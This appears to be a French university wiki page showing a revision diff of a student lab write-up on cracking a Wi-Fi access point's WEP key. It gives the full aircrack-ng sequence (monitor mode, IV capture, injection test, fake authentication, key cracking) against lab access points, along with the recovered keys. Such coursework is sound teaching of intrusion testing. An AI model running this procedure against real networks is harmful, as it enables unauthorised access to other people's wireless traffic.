TP sysres IMA5 2021/2022 G4 : Différence entre versions

De Wiki d'activités IMA
(5.2 Cassage de clef WEP d’un point d’accès WiFi)
(5.2 Cassage de clef WEP d’un point d’accès WiFi)
Ligne 3 : Ligne 3 :
 
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===
 
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===
  
La première étape est de paramétrer notre carte réseau en mode moniteur. Le mode moniteur est un mode qui permet d'écouter chaque paquet qui se promène dans l'air : l'écoute de ces paquets nous permettra d'effectuer des injections ensuite. Pour ce faire, il nous faut tout d'abord le nom de notre interface :
+
On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande :
  airmon-ng nous retourne notre interface réseau (WiPi) : wlx40a5ef0127d0
+
  airmon-ng
  
Nous démarrons ensuite notre interface en mode moniteur sur le channel 3 :
+
On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long)
  airmon-ng start wlx40a5ef0127d0 3
+
 +
On démarre l'interface sur le channel 3 :
 +
  airmon-ng start wlan0mon 3
  
Afin de cracker la clef WEP d'un point d'accès, il est nécessaire pour nous de le choisir est de récupérer son BSSID :
+
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP
  airodump-ng wlx40a5ef0127d0 nous permet d'écouter tous les paquets dans l'air
+
  airodump-ng wlan0mon
  
Nous choisissons alors la cracotte12 et récupérons son BSSID : 04:DA:D2:9C:50:5B. Pour vérifier que nous sommes assez proche du point d'accès, on effectue un test d'injection qui doit nous retourner un pourcentage proche de 100% :
+
On réalise un test d'injection sur cracotte10
  aireplay-ng -9 -e cracotte12 -a 04:DA:D2:9C:50:5B wlx40a5ef0127d0
+
  aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon
 
-9 : mode injection
 
-e cracotte12 : nom du point d'accès
 
-a 04:DA:D2:9C:50:5B : bssid du point d'accès
 
  
Dans une console, on capture ensuite les VI générés par le point d'accès afin de les stocker dans un fichier ''output'' :
+
On récupère les VI générés par le point d'accès pour les stocker dans output :
  airodump-ng -c 3 --bssid 04:DA:D2:9C:50:5B -w output wlx40a5ef0127d0
+
  airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon
 
-c 3 : canal de communication du point d'accès
 
-w output : préfixe de nom de fichier de sortie
 
 
 
Une fois cette commande lancée, dans un autre terminal nous associons notre interface réseau avec le point d'accès. Il est nécessaire de passer par une fausse authentification pour cela :
 
aireplay-ng -1 0 -e cracotte12 -a 04:DA:D2:9C:50:5B -h 40:A5:EF:01:27:D0 wlx40a5ef0127d0
 
 
-1 : mode "fake authentification"
 
0 : délai entre les demandes d'authentifications
 
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau
 
  
A noter qu'il est nécessaire de laisser la capture des VI tourner assez longtemps pour avoir assez de contenu pour cracker la clef WEP.
+
On effectue de fausses authentifications 
 +
aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon
  
La clef WEP est ensuite décriptable grâce à la commande ''aircrack-ng'' et aux fichiers ''output'' :
+
La clef WEP est décriptable :
  aircrack-ng -b 04:DA:D2:9C:50:5B output*.cap
+
  aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap
  
Lorsque tout est correctement exécuté nous obtenons le résultat suivant :
+
Le résultat obtenu est le suivant :
  KEY FOUND! [ F1:DE:D4:00:00:00:00:FF:FF:FF:FF:FF:FF ]  
+
  KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ]  
 
  Decrypted correctly: 100%
 
  Decrypted correctly: 100%

Version du 11 octobre 2021 à 17:47

Tests D'intrusions

5.2 Cassage de clef WEP d’un point d’accès WiFi

On va tout d'abord récupérer le nom de notre interface réseau grâce à la commande :

airmon-ng

On sait donc maintenant que notre interface réseau s'appelle wlan0mon (renommé automatiquement parce que celui de base était trop long)

On démarre l'interface sur le channel 3 :

airmon-ng start wlan0mon 3

On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP

airodump-ng wlan0mon 

On réalise un test d'injection sur cracotte10

aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon

On récupère les VI générés par le point d'accès pour les stocker dans output :

airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon

On effectue de fausses authentifications

aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon

La clef WEP est décriptable :

aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap

Le résultat obtenu est le suivant :

KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] 
Decrypted correctly: 100%